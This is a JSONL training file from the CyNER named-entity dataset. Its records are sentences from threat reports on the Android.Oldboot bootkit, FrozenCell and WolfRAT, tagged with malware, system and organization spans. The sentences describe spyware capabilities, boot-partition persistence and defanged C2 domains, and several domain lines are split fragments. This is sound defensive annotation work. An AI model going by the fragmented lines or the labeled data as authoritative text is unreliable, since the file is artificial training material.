{"text": "A very unique technique is being used to inject this Trojan into an Android system where an attacker places a component of it into the boot partition of the file system and modify the 'init ' script ( initialize the operating system ) to re-load the malware as you switch on your android .", "spans": {"SYSTEM: Android": [[68, 75]], "SYSTEM: android": [[280, 287]]}, "info": {"id": "cyner_train_001973", "source": "cyner_train"}}
{"text": "When you start your device , this script loads the Trojan 'imei_chk ' ( detects it as Android.Oldboot.1 ) which extract two files libgooglekernel.so ( Android.Oldboot.2 ) and GoogleKernel.apk ( Android.Oldboot.1.origin ) , copy them respectively in /system/lib and /system/app .", "spans": {}, "info": {"id": "cyner_train_001974", "source": "cyner_train"}}
{"text": "Android.Oldboot acts as a system service and connects to the command-and-controller server using libgooglekernel.so library and receives commands to download , remove installed apps , and install malicious apps .", "spans": {"MALWARE: Android.Oldboot": [[0, 15]]}, "info": {"id": "cyner_train_001975", "source": "cyner_train"}}
{"text": "Since it becomes a part of the boot partition , formatting the device will not solve the problem .", "spans": {}, "info": {"id": "cyner_train_001976", "source": "cyner_train"}}
{"text": "So , users should beware of certain modified Android firmware .", "spans": {"SYSTEM: Android": [[45, 52]]}, "info": {"id": "cyner_train_001978", "source": "cyner_train"}}
{"text": "\" Due to the special RAM disk feature of Android devices ' boot partition , all current mobile antivirus products in the world ca n't completely remove this Trojan or effectively repair the system .", "spans": {"SYSTEM: Android": [[41, 48]]}, "info": {"id": "cyner_train_001980", "source": "cyner_train"}}
{"text": "The Android malware Android.Oldboot is almost impossible to remove , not even with formatting your device .", "spans": {"SYSTEM: Android": [[4, 11]], "MALWARE: Android.Oldboot": [[20, 35]]}, "info": {"id": "cyner_train_001982", "source": "cyner_train"}}
{"text": "But if your device is not from a Chinese manufacturer , then chances that you are a victim of it , are very less .", "spans": {}, "info": {"id": "cyner_train_001983", "source": "cyner_train"}}
{"text": "This bootkit is not the first of this kind .", "spans": {}, "info": {"id": "cyner_train_001984", "source": "cyner_train"}}
{"text": "But Android.Oldboot malware is a bit more dangerous because even if you remove all working components of it from your android successfully , the component imei_chk will persist in a protected boot memory area and hence will reinstall itself on next boot and continuously infect the Smartphone .", "spans": {"MALWARE: Android.Oldboot": [[4, 19]], "SYSTEM: android": [[118, 125]]}, "info": {"id": "cyner_train_001986", "source": "cyner_train"}}
{"text": "Users are recommended to install apps from authorized stores such as Google Play , disable installation of apps from 'Unknown Sources ' and for a better security install a reputed security application .", "spans": {"SYSTEM: Google Play": [[69, 80]]}, "info": {"id": "cyner_train_001987", "source": "cyner_train"}}
{"text": "You can also try to re-flash your device with its original ROM .", "spans": {}, "info": {"id": "cyner_train_001988", "source": "cyner_train"}}
{"text": "After flashing , the bootkit will be removed .", "spans": {}, "info": {"id": "cyner_train_001989", "source": "cyner_train"}}
{"text": "FrozenCell : Multi-Platform Surveillance Campaign Against Palestinians October 5 , 2017 FrozenCell has been seen masquerading as various well known social media and chat applications as well as an app likely only used by Palestinian or Jordanian students sitting their 2016 general exams .", "spans": {"MALWARE: FrozenCell": [[0, 10], [88, 98]]}, "info": {"id": "cyner_train_001990", "source": "cyner_train"}}
{"text": "Lookout researchers have discovered a new mobile surveillanceware family , FrozenCell .", "spans": {"ORGANIZATION: Lookout": [[0, 7]], "MALWARE: FrozenCell": [[75, 85]]}, "info": {"id": "cyner_train_001991", "source": "cyner_train"}}
{"text": "FrozenCell is the mobile component of a multi-platform attack we 've seen a threat actor known as \" Two-tailed Scorpion/APT-C-23 , '' use to spy on victims through compromised mobile devices and desktops .", "spans": {"MALWARE: FrozenCell": [[0, 10]], "MALWARE: Two-tailed Scorpion/APT-C-23": [[100, 128]]}, "info": {"id": "cyner_train_001993", "source": "cyner_train"}}
{"text": "The desktop components of this attack , previously discovered by Palo Alto Network , are known as KasperAgent and Micropsia .", "spans": {"ORGANIZATION: Palo Alto Network": [[65, 82]], "MALWARE: KasperAgent": [[98, 109]], "MALWARE: Micropsia": [[114, 123]]}, "info": {"id": "cyner_train_001994", "source": "cyner_train"}}
{"text": "More data is appearing daily , leading us to believe the actors are still highly active .", "spans": {}, "info": {"id": "cyner_train_001996", "source": "cyner_train"}}
{"text": "We are continuing to watch it closely .", "spans": {}, "info": {"id": "cyner_train_001997", "source": "cyner_train"}}
{"text": "Government agencies and enterprises should look at this threat as an example of the kind of spying that is now possible given how ubiquitous mobile devices are in the workplace .", "spans": {}, "info": {"id": "cyner_train_001999", "source": "cyner_train"}}
{"text": "What it does FrozenCell masquerades as fake updates to chat applications like Facebook , WhatsApp , Messenger , LINE , and LoveChat .", "spans": {"MALWARE: FrozenCell": [[13, 23]], "SYSTEM: Facebook": [[78, 86]], "SYSTEM: WhatsApp": [[89, 97]], "SYSTEM: Messenger": [[100, 109]], "SYSTEM: LINE": [[112, 116]], "SYSTEM: LoveChat": [[123, 131]]}, "info": {"id": "cyner_train_002002", "source": "cyner_train"}}
{"text": "Once installed on a device FrozenCell is capable of : Recording calls Retrieving generic phone metadata ( e.g. , cell location , mobile country code , mobile network code ) Geolocating a device Extracting SMS messages Retrieving a victim 's accounts Exfiltrating images Downloading and installing additional applications Searching for and exfiltrating pdf , doc , docx , ppt , pptx , xls , and xlsx file types Retrieving contacts The graph below represents a split of the types of data", "spans": {"MALWARE: FrozenCell": [[27, 37]]}, "info": {"id": "cyner_train_002005", "source": "cyner_train"}}
{"text": "from only one misconfigured command and control server ( out of over 37 servers ) .", "spans": {}, "info": {"id": "cyner_train_002006", "source": "cyner_train"}}
{"text": "Split of exfiltrated data Some noteworthy files identified in content taken from compromised devices include passport photos , audio recordings of calls , other images , and a PDF document with data on 484 individuals .", "spans": {}, "info": {"id": "cyner_train_002008", "source": "cyner_train"}}
{"text": "The PDF lists dates of birth , gender , passport numbers , and names .", "spans": {}, "info": {"id": "cyner_train_002009", "source": "cyner_train"}}
{"text": "Potential targets The actors behind FrozenCell used an online service that geolocates mobile devices based on nearby cell towers to track targets .", "spans": {"MALWARE: FrozenCell": [[36, 46]]}, "info": {"id": "cyner_train_002010", "source": "cyner_train"}}
{"text": "This data shows a distinct concentration of infected devices beaconing from Gaza , Palestine .", "spans": {}, "info": {"id": "cyner_train_002011", "source": "cyner_train"}}
{"text": "It has not been confirmed whether these are from test devices or the devices of victims .", "spans": {}, "info": {"id": "cyner_train_002014", "source": "cyner_train"}}
{"text": "We were also able to link the FrozenCell 's Android infrastructure to numerous desktop samples that are part of the larger multi-platform attack .", "spans": {"MALWARE: FrozenCell": [[30, 40]], "SYSTEM: Android": [[44, 51]]}, "info": {"id": "cyner_train_002015", "source": "cyner_train"}}
{"text": "It appears the attackers sent malicious executables though phishing campaigns impersonating individuals associated with the Palestinian Security Services , the General Directorate of Civil Defence - Ministry of the Interior , and the 7th Fateh Conference of the Palestinian National Liberation Front ( held in late 2016 ) .", "spans": {"ORGANIZATION: Palestinian Security Services": [[124, 153]], "ORGANIZATION: General Directorate of Civil Defence": [[160, 196]], "ORGANIZATION: Ministry of the Interior": [[199, 223]], "ORGANIZATION: Palestinian National Liberation Front": [[262, 299]]}, "info": {"id": "cyner_train_002016", "source": "cyner_train"}}
{"text": "Some malicious files associated with these samples were titled the following : Council_of_ministres_decision Minutes of the Geneva Meeting on Troops Summary of today 's meetings.doc.exe The most important points of meeting the memory of the late President Abu Omar may Allah have mercy on him - Paper No .", "spans": {}, "info": {"id": "cyner_train_002018", "source": "cyner_train"}}
{"text": "1 Fadi Alsalamin scandal with an Israeli officer - exclusive - watched before the deletion - Fadi Elsalameen The details of the assassination of President Arafat_06-12-2016_docx Quds.rar Many of these executables are associated with various short links created using Bit.ly , a URL shortening service .", "spans": {"SYSTEM: Bit.ly": [[267, 273]]}, "info": {"id": "cyner_train_002019", "source": "cyner_train"}}
{"text": "Infrastructure At the time of writing the following domains have either been used by this family or are currently active .", "spans": {}, "info": {"id": "cyner_train_002022", "source": "cyner_train"}}
{"text": "We expect this list to grow given that this actor has changed its infrastructure numerous times in 2017 .", "spans": {}, "info": {"id": "cyner_train_002023", "source": "cyner_train"}}
{"text": "] orgmary-crawley [ .", "spans": {}, "info": {"id": "cyner_train_002026", "source": "cyner_train"}}
{"text": "] comrose-sturat [ .", "spans": {}, "info": {"id": "cyner_train_002028", "source": "cyner_train"}}
{"text": "] xyzdebra-morgan [ .", "spans": {}, "info": {"id": "cyner_train_002030", "source": "cyner_train"}}
{"text": "] infoacount-manager [ .", "spans": {}, "info": {"id": "cyner_train_002032", "source": "cyner_train"}}
{"text": "] infogooogel-drive [ .", "spans": {}, "info": {"id": "cyner_train_002033", "source": "cyner_train"}}
{"text": "] commediauploader [ .", "spans": {}, "info": {"id": "cyner_train_002034", "source": "cyner_train"}}
{"text": "] comgo-mail-accounts [ .", "spans": {}, "info": {"id": "cyner_train_002041", "source": "cyner_train"}}
{"text": "] netsybil-parks [ .", "spans": {}, "info": {"id": "cyner_train_002043", "source": "cyner_train"}}
{"text": "] infodavos-seaworth [ .", "spans": {}, "info": {"id": "cyner_train_002044", "source": "cyner_train"}}
{"text": "] orgacount-manager [ .", "spans": {}, "info": {"id": "cyner_train_002046", "source": "cyner_train"}}
{"text": "] comlila-tournai [ .", "spans": {}, "info": {"id": "cyner_train_002047", "source": "cyner_train"}}
{"text": "] comaccount-manager [ .", "spans": {}, "info": {"id": "cyner_train_002048", "source": "cyner_train"}}
{"text": "] orgmediauploader [ .", "spans": {}, "info": {"id": "cyner_train_002049", "source": "cyner_train"}}
{"text": "] infomavis-dracula [ .", "spans": {}, "info": {"id": "cyner_train_002052", "source": "cyner_train"}}
{"text": "] infogoogle-support-team [ .", "spans": {}, "info": {"id": "cyner_train_002054", "source": "cyner_train"}}
{"text": "] comuseraccount [ .", "spans": {}, "info": {"id": "cyner_train_002056", "source": "cyner_train"}}
{"text": "] comfeteh-asefa [ .", "spans": {}, "info": {"id": "cyner_train_002059", "source": "cyner_train"}}
{"text": "] comlagertha-lothbrok [ .", "spans": {}, "info": {"id": "cyner_train_002060", "source": "cyner_train"}}
{"text": "This mistake in operational security allowed us to gain visibility into exfiltrated content for a number of devices .", "spans": {}, "info": {"id": "cyner_train_002062", "source": "cyner_train"}}
{"text": "Continued mirroring suggests it is likely a regularly cleaned staging server .", "spans": {}, "info": {"id": "cyner_train_002063", "source": "cyner_train"}}
{"text": "We sourced the over 561MB of exfiltrated data from this domain alone , all of which we found to be 7z compressed and password protected .", "spans": {}, "info": {"id": "cyner_train_002064", "source": "cyner_train"}}
{"text": "Password generation for compressed files takes place client-side with each device using a unique key in most scenarios .", "spans": {}, "info": {"id": "cyner_train_002065", "source": "cyner_train"}}
{"text": "Visually , this can be represented as follows : Android ID When combined with our analysis of indexed directories on C2 infrastructure , we were able to easily automate the generation of the password used by each device and , in turn , successfully decompress all exfiltrated content from compromised devices .", "spans": {"SYSTEM: Android": [[48, 55]]}, "info": {"id": "cyner_train_002067", "source": "cyner_train"}}
{"text": "FrozenCell is part of a very successful , multi-platform surveillance campaign .", "spans": {"MALWARE: FrozenCell": [[0, 10]]}, "info": {"id": "cyner_train_002071", "source": "cyner_train"}}
{"text": "Attackers are growing smarter , targeting individuals through the devices and the services they use most .", "spans": {}, "info": {"id": "cyner_train_002072", "source": "cyner_train"}}
{"text": "TUESDAY , MAY 19 , 2020 The wolf is back ... NEWS SUMMARY Thai Android devices and users are being targeted by a modified version of DenDroid we are calling \" WolfRAT , '' now targeting messaging apps like WhatsApp , Facebook Messenger and Line .", "spans": {"SYSTEM: Android": [[63, 70]], "MALWARE: DenDroid": [[133, 141]], "MALWARE: WolfRAT": [[159, 166]], "SYSTEM: WhatsApp": [[206, 214]], "SYSTEM: Facebook Messenger": [[217, 235]], "SYSTEM: Line": [[240, 244]]}, "info": {"id": "cyner_train_002074", "source": "cyner_train"}}
{"text": "We assess with high confidence that this modified version is operated by the infamous Wolf Research .", "spans": {"ORGANIZATION: Wolf Research": [[86, 99]]}, "info": {"id": "cyner_train_002075", "source": "cyner_train"}}
{"text": "This actor has shown a surprising level of amateur actions , including code overlaps , open-source project copy/paste , classes never being instanced , unstable packages and unsecured panels .", "spans": {}, "info": {"id": "cyner_train_002076", "source": "cyner_train"}}
{"text": "EXECUTIVE SUMMARY Cisco Talos has discovered a new Android malware based on a leak of the DenDroid malware family .", "spans": {"ORGANIZATION: Cisco Talos": [[18, 29]], "MALWARE: DenDroid": [[90, 98]]}, "info": {"id": "cyner_train_002077", "source": "cyner_train"}}
{"text": "We named this malware \" WolfRAT '' due to strong links between this malware ( and the command and control ( C2 ) infrastructure ) and Wolf Research , an infamous organization that developed interception and espionage-based malware and was publicly described by CSIS during Virus Bulletin 2018 .", "spans": {"MALWARE: WolfRAT": [[24, 31]], "ORGANIZATION: Wolf Research": [[134, 147]]}, "info": {"id": "cyner_train_002078", "source": "cyner_train"}}
{"text": "Some of the C2 servers are located in Thailand .", "spans": {}, "info": {"id": "cyner_train_002082", "source": "cyner_train"}}
{"text": "The panels also contain Thai JavaScript comments and the domain names also contain references to Thai food , a tactic commonly employed to entice users to click/visit these C2 panels without much disruption .", "spans": {}, "info": {"id": "cyner_train_002083", "source": "cyner_train"}}
{"text": "We identified a notable lack of sophistication in this investigation such as copy/paste , unstable code , dead code and panels that are freely open .", "spans": {}, "info": {"id": "cyner_train_002084", "source": "cyner_train"}}
{"text": "WolfRAT is based on a previously leaked malware named DenDroid .", "spans": {"MALWARE: WolfRAT": [[0, 7]], "MALWARE: DenDroid": [[54, 62]]}, "info": {"id": "cyner_train_002086", "source": "cyner_train"}}
{"text": "The new malware appears to be linked to the infamous Wolf Research organization and targets Android devices located in Thailand .", "spans": {"ORGANIZATION: Wolf Research": [[53, 66]], "SYSTEM: Android": [[92, 99]]}, "info": {"id": "cyner_train_002087", "source": "cyner_train"}}
{"text": "The malware mimics legit services such as Google service , GooglePlay or Flash update .", "spans": {"ORGANIZATION: Google": [[42, 48]], "SYSTEM: GooglePlay": [[59, 69]], "SYSTEM: Flash": [[73, 78]]}, "info": {"id": "cyner_train_002089", "source": "cyner_train"}}
{"text": "The malware is not really advanced and is based on a lot of copy/paste from public sources available on the Internet .", "spans": {}, "info": {"id": "cyner_train_002090", "source": "cyner_train"}}
{"text": "The C2 infrastructure contains a lack of sophistication such as open panels , reuse of old servers publicly tagged as malicious… So what ?", "spans": {}, "info": {"id": "cyner_train_002091", "source": "cyner_train"}}
{"text": "After being publicly denounced by CSIS Group — a threat intelligence company in Denmark — Wolf Research was closed and a new organization named LokD was created .", "spans": {"ORGANIZATION: CSIS Group": [[34, 44]], "ORGANIZATION: Wolf Research": [[90, 103]], "ORGANIZATION: LokD": [[144, 148]]}, "info": {"id": "cyner_train_002092", "source": "cyner_train"}}
{"text": "This new organization seems to work on securing Android devices .", "spans": {"ORGANIZATION: Android": [[48, 55]]}, "info": {"id": "cyner_train_002093", "source": "cyner_train"}}
{"text": "However , thanks to the infrastructure sharing and forgotten panel names , we assess with high confidence that this actor is still active , it is still developing malware and has been using it from mid-June to today .", "spans": {}, "info": {"id": "cyner_train_002094", "source": "cyner_train"}}
{"text": "On the C2 panel , we found a potential link between Wolf Research and another Cyprus organization named Coralco Tech .", "spans": {"ORGANIZATION: Wolf Research": [[52, 65]], "ORGANIZATION: Coralco Tech": [[104, 116]]}, "info": {"id": "cyner_train_002095", "source": "cyner_train"}}
{"text": "This organization is also working on interception technology .", "spans": {}, "info": {"id": "cyner_train_002096", "source": "cyner_train"}}
{"text": "LINKS TO WOLF INTELLIGENCE During the Virus Bulletin conference in 2018 , CSIS researchers Benoît Ancel and Aleksejs Kuprins did a presentation on Wolf Research and the offensive arsenal developed by the organization .", "spans": {"ORGANIZATION: CSIS": [[74, 78]], "ORGANIZATION: Wolf Research": [[147, 160]]}, "info": {"id": "cyner_train_002097", "source": "cyner_train"}}
{"text": "They mentioned an Android , iOS and Windows remote access tool ( RAT ) .", "spans": {"SYSTEM: Android": [[18, 25]], "SYSTEM: iOS": [[28, 31]], "SYSTEM: Windows": [[36, 43]]}, "info": {"id": "cyner_train_002098", "source": "cyner_train"}}
{"text": "Their findings showed that Wolf is headquartered in Germany with offices in Cyprus , Bulgaria , Romania , India and ( possibly ) the U.S .", "spans": {}, "info": {"id": "cyner_train_002099", "source": "cyner_train"}}
{"text": "However , the director created a new organization in Cyprus named LokD .", "spans": {"ORGANIZATION: LokD": [[66, 70]]}, "info": {"id": "cyner_train_002101", "source": "cyner_train"}}
{"text": "Based on infrastructure overlaps and leaked information , we assess with high confidence that the malware we identified and present in this paper is linked to Wolf Research .", "spans": {"ORGANIZATION: Wolf Research": [[159, 172]]}, "info": {"id": "cyner_train_002104", "source": "cyner_train"}}
{"text": "One of the samples ( e19823a1ba4a0e40cf459f4a0489fc257720cc0d71ecfb7ad94b3ca86fbd85d1 ) uses the C2 server svcws [ .", "spans": {}, "info": {"id": "cyner_train_002105", "source": "cyner_train"}}
{"text": "The new one with the title \" Coralco Archimedes , '' and an older version with the title \" Wolf Intelligence : '' New panel Old panel The new panel name contains \" Coralco '' in its name .", "spans": {}, "info": {"id": "cyner_train_002109", "source": "cyner_train"}}
{"text": "Coralco Tech is an organization located in Cyprus and providing interception tools .", "spans": {"ORGANIZATION: Coralco Tech": [[0, 12]]}, "info": {"id": "cyner_train_002110", "source": "cyner_train"}}
{"text": "We can not say for sure if Wolf Research and Coralco Tech are linked , but this panel name , their offerings and the panel layout would suggest it should be considered suspiciously linked .", "spans": {"ORGANIZATION: Wolf Research": [[27, 40]], "ORGANIZATION: Coralco Tech": [[45, 57]]}, "info": {"id": "cyner_train_002111", "source": "cyner_train"}}
{"text": "Coralco Tech 's services description .", "spans": {}, "info": {"id": "cyner_train_002112", "source": "cyner_train"}}
{"text": "VICTIMOLOGY ON THE IDENTIFIED CAMPAIGNS The campaigns we analyzed targeted Android devices in Thailand .", "spans": {"SYSTEM: Android": [[75, 82]]}, "info": {"id": "cyner_train_002113", "source": "cyner_train"}}
{"text": "The C2 server domain is linked to Thai food : Nampriknum [ .", "spans": {}, "info": {"id": "cyner_train_002114", "source": "cyner_train"}}
{"text": "] net : Nam Phrik Num Somtum [ .", "spans": {}, "info": {"id": "cyner_train_002115", "source": "cyner_train"}}
{"text": "] today : Som Tum We also identified comments in Thai on the C2 infrastructure mentioned in the previous chapter : MALWARE DenDroid The Android malware is based on the DenDroid Android malware .", "spans": {"MALWARE: DenDroid": [[123, 131], [168, 176]], "SYSTEM: Android": [[136, 143]]}, "info": {"id": "cyner_train_002116", "source": "cyner_train"}}
{"text": "Several analysis reports were published on this malware in 2014 and , finally , the source code was leaked in 2015 .", "spans": {}, "info": {"id": "cyner_train_002117", "source": "cyner_train"}}
{"text": "The original leak is no longer available on github.com , but a copy can be found here .", "spans": {}, "info": {"id": "cyner_train_002118", "source": "cyner_train"}}
{"text": "The table below shows the commands available to the operator for tasking on infected devices .", "spans": {}, "info": {"id": "cyner_train_002119", "source": "cyner_train"}}
{"text": "This malware is simplistic in comparison to some modern-day Android malware .", "spans": {"SYSTEM: Android": [[60, 67]]}, "info": {"id": "cyner_train_002120", "source": "cyner_train"}}
{"text": "The commands are self-explanatory and show the features included in the malware .", "spans": {}, "info": {"id": "cyner_train_002122", "source": "cyner_train"}}
{"text": "Some of them like takephoto , takevideo , recordaudio , getsentsms and uploadpictures are focused on espionage activities .", "spans": {}, "info": {"id": "cyner_train_002123", "source": "cyner_train"}}
{"text": "Others like transferbot , promptupdate and promptuninstall are meant to help the operator manage the malware .", "spans": {}, "info": {"id": "cyner_train_002124", "source": "cyner_train"}}
{"text": "Version # 1 : June 2019 — Domain : databit [ .", "spans": {}, "info": {"id": "cyner_train_002125", "source": "cyner_train"}}
{"text": "] today During our investigation , we identified at least four major releases of the RAT .", "spans": {}, "info": {"id": "cyner_train_002126", "source": "cyner_train"}}
{"text": "The code is obfuscated but not packed .", "spans": {}, "info": {"id": "cyner_train_002129", "source": "cyner_train"}}
{"text": "This malware also contains a screen recorder .", "spans": {}, "info": {"id": "cyner_train_002130", "source": "cyner_train"}}
{"text": "During our analysis of this sample , we did notice that the class itself is never called or used by the malware .", "spans": {}, "info": {"id": "cyner_train_002133", "source": "cyner_train"}}
{"text": "It remains available within the source code but no method of use takes place .", "spans": {}, "info": {"id": "cyner_train_002134", "source": "cyner_train"}}
{"text": "Version # 2 : June - Aug. 2019 — Domain : somtum [ .", "spans": {}, "info": {"id": "cyner_train_002135", "source": "cyner_train"}}
{"text": "] today This is the first version that shows the code organization evolution that will continue to be used on all other functions throughout this malware .", "spans": {}, "info": {"id": "cyner_train_002136", "source": "cyner_train"}}
{"text": "One of the first changes that stands out is that the screen recording feature mentioned in the previous sample has been removed .", "spans": {}, "info": {"id": "cyner_train_002138", "source": "cyner_train"}}
{"text": "This class is based on public code belonging to the package praeda.muzikmekan , which can be found here among other places .", "spans": {}, "info": {"id": "cyner_train_002140", "source": "cyner_train"}}
{"text": "Just like in previous examples , the malware author does not use this package .", "spans": {}, "info": {"id": "cyner_train_002141", "source": "cyner_train"}}
{"text": "Missing permissions The lack of the READ_FRAME_BUFFER permission can be justified by the removal of the screen record feature .", "spans": {}, "info": {"id": "cyner_train_002142", "source": "cyner_train"}}
{"text": "The ACCESS_SUPERUSER may have been removed because it was deprecated upon the release of Android 5.0 Lollipop which happened in 2014 .", "spans": {"SYSTEM: Android 5.0": [[89, 100]], "SYSTEM: Lollipop": [[101, 109]]}, "info": {"id": "cyner_train_002143", "source": "cyner_train"}}
{"text": "Version # 3 : Sept. - Dec. 2019 — Domain : ponethus [ .", "spans": {}, "info": {"id": "cyner_train_002145", "source": "cyner_train"}}
{"text": "] com Given that there is some overlap in the previous two versions , it came as no surprise to us that we finally identified a sample which is an evolution based on both previous versions .", "spans": {}, "info": {"id": "cyner_train_002146", "source": "cyner_train"}}
{"text": "This sample is clearly a mix between the two .", "spans": {}, "info": {"id": "cyner_train_002147", "source": "cyner_train"}}
{"text": "However , this time , the permission is actually used .", "spans": {}, "info": {"id": "cyner_train_002150", "source": "cyner_train"}}
{"text": "WhatsApp message capture The service com.serenegiant.service.ScreenRecorderService , is invoked by the ScreenRecorderActivity .", "spans": {"SYSTEM: WhatsApp": [[0, 8]]}, "info": {"id": "cyner_train_002151", "source": "cyner_train"}}
{"text": "Upon creation , this activity launches a thread that will loop on a 50-second interval .", "spans": {}, "info": {"id": "cyner_train_002152", "source": "cyner_train"}}
{"text": "In the first iteration , the screen recording is started and will only stop when the RAT determines that WhatsApp is not running .", "spans": {"SYSTEM: WhatsApp": [[105, 113]]}, "info": {"id": "cyner_train_002153", "source": "cyner_train"}}
{"text": "It 's restarted in the next cycle independently based on if WhatsApp is running .", "spans": {"SYSTEM: WhatsApp": [[60, 68]]}, "info": {"id": "cyner_train_002154", "source": "cyner_train"}}
{"text": "Even though we could not find indications of being in use , two stand out .", "spans": {}, "info": {"id": "cyner_train_002156", "source": "cyner_train"}}
{"text": "Bluetooth — which allows the interaction with the Bluetooth interface , and net/deacon — which implements a beaconing system based on UDP .", "spans": {}, "info": {"id": "cyner_train_002157", "source": "cyner_train"}}
{"text": "Again , this package source code is publicly available and can be found here .", "spans": {}, "info": {"id": "cyner_train_002159", "source": "cyner_train"}}
{"text": "One of the uses the malware gives to this package is the execution of the command \" dumpsys '' to determine if certain activities are running .", "spans": {}, "info": {"id": "cyner_train_002160", "source": "cyner_train"}}
{"text": "Check if chat apps are running In the above example , the malware is searching for Line , Facebook Messenger and WhatsApp activities .", "spans": {"SYSTEM: Facebook Messenger": [[90, 108]], "SYSTEM: WhatsApp": [[113, 121]]}, "info": {"id": "cyner_train_002161", "source": "cyner_train"}}
{"text": "This is part of a class called CaptureService , which already existed in the previous version but it was not duly implemented .", "spans": {}, "info": {"id": "cyner_train_002162", "source": "cyner_train"}}
{"text": "Previous version The capture service class implements the chat applications interception .", "spans": {}, "info": {"id": "cyner_train_002163", "source": "cyner_train"}}
{"text": "Another novelty is a VPN-related package , which is based on OrbotVPN .", "spans": {"SYSTEM: OrbotVPN": [[61, 69]]}, "info": {"id": "cyner_train_002166", "source": "cyner_train"}}
{"text": "Once again , it does n't seem to actually be in use .", "spans": {}, "info": {"id": "cyner_train_002167", "source": "cyner_train"}}
{"text": "The same happens with the package squareup.otto , which is an open-source bus implementation focused on Android implementation .", "spans": {"SYSTEM: Android": [[104, 111]]}, "info": {"id": "cyner_train_002168", "source": "cyner_train"}}
{"text": "Both sources can be found here and here .", "spans": {}, "info": {"id": "cyner_train_002169", "source": "cyner_train"}}
{"text": "Version # 4 : April 2020 — Domain : nampriknum.net Following the same pattern , this version has some added features and others , which were not in use , removed .", "spans": {}, "info": {"id": "cyner_train_002170", "source": "cyner_train"}}
{"text": "First of all the new package name is com.google.services , which can easily be confused with a legitimate Google service .", "spans": {"ORGANIZATION: Google": [[106, 112]]}, "info": {"id": "cyner_train_002171", "source": "cyner_train"}}
{"text": "The VPN package is no longer present , further reinforcing our conclusion that it was not in use .", "spans": {}, "info": {"id": "cyner_train_002172", "source": "cyner_train"}}
{"text": "WolfRAT application screen The Google GMS and Firebase service has been added , however , no configuration has been found , even though services seem to be referenced in the of a new class .", "spans": {"MALWARE: WolfRAT": [[0, 7]], "SYSTEM: Google GMS": [[31, 41]], "SYSTEM: Firebase": [[46, 54]]}, "info": {"id": "cyner_train_002173", "source": "cyner_train"}}
{"text": "This would allow the RAT to receive system notifications .", "spans": {}, "info": {"id": "cyner_train_002175", "source": "cyner_train"}}
{"text": "Notification handling method The class is only implemented in debug mode , pushing all captured information into the log .", "spans": {}, "info": {"id": "cyner_train_002176", "source": "cyner_train"}}
{"text": "This service , along with the API , was fully decommissioned in March 2019 .", "spans": {}, "info": {"id": "cyner_train_002178", "source": "cyner_train"}}
{"text": "This version adds one significant class — it requests DEVICE_ADMIN privileges .", "spans": {}, "info": {"id": "cyner_train_002179", "source": "cyner_train"}}
{"text": "Device admin policies Looking at the policy 's definition , we can see that it lists all the available policies even if most of them are deprecated on Android 10.0 and their usage results in a security exception .", "spans": {"SYSTEM: Android 10.0": [[151, 163]]}, "info": {"id": "cyner_train_002180", "source": "cyner_train"}}
{"text": "The code implementation again seems that it has been added for testing purposes only .", "spans": {}, "info": {"id": "cyner_train_002181", "source": "cyner_train"}}
{"text": "Versions overview The DenDroid code base was kept to such an extent that even the original base64-encoded password was kept .", "spans": {"MALWARE: DenDroid": [[22, 30]]}, "info": {"id": "cyner_train_002182", "source": "cyner_train"}}
{"text": "Original password The main service follows the same structure as the first version , the anti-analysis features are primitive , only checking the emulator environment without any kind of packing or obfuscation .", "spans": {}, "info": {"id": "cyner_train_002183", "source": "cyner_train"}}
{"text": "The malware will start the main service if all the requested permissions and the device admin privileges are granted .", "spans": {}, "info": {"id": "cyner_train_002184", "source": "cyner_train"}}
{"text": "Otherwise , it will launch an ACTION_APPLICATION_SETTINGS intent trying to trick the user to grant the permissions .", "spans": {}, "info": {"id": "cyner_train_002185", "source": "cyner_train"}}
{"text": "It seems , however , if the same victim has more than one device the malware can be reused since the IMEI is sent along with each data exfiltration .", "spans": {}, "info": {"id": "cyner_train_002187", "source": "cyner_train"}}
{"text": "CONCLUSION We witness actors continually using open-source platforms , code and packages to create their own software .", "spans": {}, "info": {"id": "cyner_train_002189", "source": "cyner_train"}}
{"text": "Some are carried out well , others , like WolfRAT , are designed with an overload of functionality in mind as opposed to factoring any sensible approach to the development aspect .", "spans": {"MALWARE: WolfRAT": [[42, 49]]}, "info": {"id": "cyner_train_002190", "source": "cyner_train"}}
{"text": "throughout the Android package .", "spans": {"SYSTEM: Android": [[15, 22]]}, "info": {"id": "cyner_train_002193", "source": "cyner_train"}}
{"text": "This can be packaged and \" sold '' in many different ways to customers .", "spans": {}, "info": {"id": "cyner_train_002195", "source": "cyner_train"}}
{"text": "A \" Tracking tool '' or an \" Admin tool '' are often cited for these kinds of tools for \" commercial '' or \" enterprise '' usage .", "spans": {}, "info": {"id": "cyner_train_002196", "source": "cyner_train"}}
{"text": "Wolf Research claimed to shut down their operations but we clearly see that their previous work continues under another guise .", "spans": {}, "info": {"id": "cyner_train_002197", "source": "cyner_train"}}
{"text": "The ability to carry out these types of intelligence-gathering activities on phones represents a huge score for the operator .", "spans": {}, "info": {"id": "cyner_train_002198", "source": "cyner_train"}}
{"text": "The chat details , WhatsApp records , messengers and SMSs of the world carry some sensitive information which people often forget when communicating with their devices .", "spans": {"SYSTEM: WhatsApp": [[19, 27]]}, "info": {"id": "cyner_train_002199", "source": "cyner_train"}}
{"text": "We see WolfRAT specifically targeting a highly popular encrypted chat app in Asia , Line , which suggests that even a careful user with some awareness around end-to-end encryption chats would still be at the mercy of WolfRAT and it 's prying eyes .", "spans": {"MALWARE: WolfRAT": [[7, 14], [217, 224]], "SYSTEM: Line": [[84, 88]]}, "info": {"id": "cyner_train_002200", "source": "cyner_train"}}
{"text": "IOCS Hashes 139edb1bc033725539b117f50786f3d3362ed45845c57fe1f82e7ed72b044367 e19823a1ba4a0e40cf459f4a0489fc257720cc0d71ecfb7ad94b3ca86fbd85d1 e19823a1ba4a0e40cf459f4a0489fc257720cc0d71ecfb7ad94b3ca86fbd85d1 e5f346d8f312cc1f93c2c6af611e2f50805c528934786ea173cabc6a39b14cda", "spans": {}, "info": {"id": "cyner_train_002201", "source": "cyner_train"}}
{"text": "1849a50a6ac9b3eec51492745eeb14765fe2e78488d476b0336d8e41c2c581d4 d328fca14c4340fcd4a15e47562a436085e6b1bb5376b5ebd83d3e7218db64e7 59b9809dba857c5969f23f460a2bf0a337a71622a79671066675ec0acf89c810 120474682ea439eb0b28274c495d9610a73d892a4b8feeff268c670570db97e2", "spans": {}, "info": {"id": "cyner_train_002202", "source": "cyner_train"}}
